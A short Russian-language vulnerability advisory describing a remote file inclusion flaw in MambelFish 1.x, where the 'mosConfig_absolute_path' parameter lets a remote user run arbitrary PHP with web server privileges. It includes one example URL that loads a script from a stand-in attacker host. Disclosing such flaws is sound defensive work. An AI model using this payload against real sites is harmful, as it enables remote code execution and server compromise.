• Партнер

  • Программа: MambelFish 1.x

    Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе. Уязвимость существует из-за недостаточной обработки входных данных в параметре "mosConfig_absolute_path" в сценарии mambelfish.class.php. Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера.

    Пример:

    http://www.site.com/[path]/administrator/components/com_mambelfish/ mambelfish.class.php?mosConfig_absolute_path= http://site.com/evilscript.txt?

    Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии